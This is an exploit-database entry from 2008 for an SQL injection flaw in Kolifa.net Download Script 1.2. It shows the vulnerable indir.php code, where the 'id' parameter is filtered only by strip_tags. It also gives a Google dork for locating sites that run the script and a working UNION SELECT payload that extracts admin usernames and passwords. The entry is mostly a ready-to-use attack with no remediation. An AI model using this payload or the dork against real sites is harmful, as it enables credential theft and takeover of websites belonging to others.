Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability

2008-08-26T00:00:00
ID 1337DAY-ID-3565
Type zdt
Reporter Kacak
Modified 2008-08-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability
===============================================================



Title: Kolifa.Net Download Script (indir.php)

================================================================

[+] Author : Kacak

[+] Special Thankz : Sa0 & Knock0ut & Biyocanlar & BilisimCanlar & All My Friends

[+] http://www.lmfrf.org/kolifanet-download-script-12-sql-injection-vulnerability/2008/08/26/web-script-bug/

=================================================================

Script : Kolifa.Net Download Script

Demo : http://kolifadwn.awardspace.com/down

Google Dork : inurl:prog.php?dwkodu=

Error Code :  

<?php
//*****************************
//*****************************
//********** KOLIFA ***********
//********** DOWNLOAD *********
//********** SCRIPT ***********
//*****************************
//****** www.kolifa.net *******
//*****************************
ini_set('error_reporting', E_ALL^E_NOTICE);
include("ayarlar.php");
require('fonksiyon.php');
$baglanti = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Veritaban?na baglan?lamad?.");
$sec = mysql_select_db($db);
$dwkodu=strip_tags($_GET['id']);
$act=strip_tags($_GET['act']);
?>

---------------------------

Example : http://[Site]/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/

[<p>Eger Yuklenme Islemi Baslamazsa <a href="Username:Password">Buraya T?klay?n</a></td>]


###############################################################

< -- bug code start -- >

www.site.com/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*

/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*

< -- bug code end of -- >



#  0day.today [2018-01-03]  #